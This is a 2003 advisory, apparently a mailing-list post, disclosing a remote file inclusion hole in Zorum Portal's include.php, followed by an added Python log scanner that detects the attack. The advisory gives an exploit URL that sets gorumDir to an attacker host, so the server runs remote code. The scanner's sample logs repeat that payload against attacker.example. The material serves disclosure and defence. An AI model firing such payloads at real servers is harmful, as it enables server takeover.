Zorum Portal (PHP)

From: MGhz (magasat_private)
Date: Wed Jan 22 2003 - 11:45:26 PST


    
    Version : 3.0;3.1;3.2
    Website : http://zorum.phpoutsourcing.com/
    Problem : Include file
    
    
    File:
    ---------------------------------
    include.php
    ---------------------------------
    
    PHP Code:
    ---------------------------------
    [...]
    include("$gorumDir/generformlib_multipleselection.php");
    include("$gorumDir/generformlib_groupselection.php");
    include("$gorumDir/generformlib_filebutton.php");
    include("$gorumDir/group.php");
    [...]
    ---------------------------------
    
    Exploit :
    ---------------------------------
    http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/
    -->
    include http://[attacker]/group.php on remote server
    ---------------------------------
    
    --
    magasat_private
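
For anyone reviewing web-server logs, the request pattern in the exploit URL above can be flagged as follows. This is an added example, not part of the original post or of Zorum's code; the access-log format, the sample lines and addresses are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside an access-log entry (common/combined format is assumed).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value that starts like a URL or stream wrapper: http://, ftp://, php://, data:
SCHEME_RE = re.compile(r'^(?:[a-z][a-z0-9+.\-]*://|data:)', re.I)
PARAM = "gorumDir"  # variable name from the advisory; PHP names are case-sensitive

def classify(line):
    """Return None, 'override' (client supplied gorumDir) or
    'remote-include' (client supplied gorumDir and it points at a URL)."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    verdict = None
    query = urlsplit(m.group(1)).query
    # parse_qsl percent-decodes exactly once, as PHP does for request input.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name != PARAM:
            continue
        if SCHEME_RE.match(value):
            return "remote-include"
        verdict = "override"
    return verdict

def scan(lines):
    """Return (line_number, verdict) for every suspicious log line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        verdict = classify(line)
        if verdict:
            hits.append((number, verdict))
    return hits

# Constructed sample log lines (documentation addresses and host names).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Jan/2003:11:50:01 -0800] "GET /forum/index.php?page=2 HTTP/1.0" 200 5120',
    '192.0.2.44 - - [22/Jan/2003:11:52:13 -0800] "GET /forum/include.php?gorumDir=http://attacker.example/ HTTP/1.0" 200 312',
    '192.0.2.44 - - [22/Jan/2003:11:52:20 -0800] "GET /forum/include.php?gorumDir=hTTp%3A%2F%2Fattacker.example%2F HTTP/1.0" 200 312',
    '192.0.2.61 - - [22/Jan/2003:11:53:02 -0800] "GET /forum/include.php?gorumDir=./gorum HTTP/1.0" 200 2048',
]

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(f"line {number}: {verdict}")
```

Any client-supplied `gorumDir` is flagged, since the include path should never come from the request. Parameters sent in a POST body or cookie do not appear in an access log, so this check covers only the query string.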
    


